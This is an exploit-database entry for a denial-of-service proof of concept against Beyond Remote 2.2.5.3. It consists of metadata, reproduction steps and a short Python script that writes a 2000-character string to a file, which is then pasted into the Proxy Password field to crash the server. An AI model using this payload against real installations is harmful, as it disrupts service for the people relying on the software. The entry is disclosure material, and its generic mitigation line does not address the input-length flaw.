Vendor: Beyond Remote
By: Erenay Gencay
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: Beyond Remote
Affected Version From: 2.2.5.3
Affected Version To: 2.2.5.3
Patch Exists: YES
Related CWE: N/A
CPE: 2.2.5.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP Professional sp3 (ENG)
2018

Beyond Remote 2.2.5.3 – Denial of Service (PoC)

Run the Python exploit script; it will create a new file named 'mre.txt'. Copy the content of 'mre.txt'. Start Beyond Remote Server 2.2.5.3 and click 'Configure', then 'Update Options', then 'Proxy Settings'. Paste the content into the 'Proxy Password' field and click 'OK'. This causes the denial-of-service condition.

Mitigation:

Ensure that the application is configured to use secure authentication methods and that the application is regularly updated with the latest security patches.

Exploit-DB raw data:

# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)
# Author: Erenay Gencay
# Discovery Date: 2018-09-24
# Vendor notified : 2018-09-24
# Software Link: https://beyond-remote-client-and-server.jaleco.com/
# Tested Version: 2.2.5.3
# Tested on OS: Windows XP Professional sp3 (ENG)

# Steps to Reproduce: Run the python exploit script; it will create a new file
# with the name "mre.txt". Copy the content of the new file "mre.txt".
# Start Beyond Remote Server 2.2.5.3 and click "Configure", then click "Update Options", then
# click "Proxy Settings". Paste the content into the field "Proxy Password" and click "OK".
# It will cause the DoS situation.

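# 2000 "A" characters, the string pasted into the "Proxy Password" field
bof = "A" * 2000

try:
    print("payload is loading..")

    # Write the string to mre.txt; the with-block closes the file
    with open('mre.txt', 'w') as dosya:
        dosya.write(bof)
    print(" [+] File Created")

# Catch only file I/O failures instead of every exception
except (IOError, OSError):
    print("Something went wrong !")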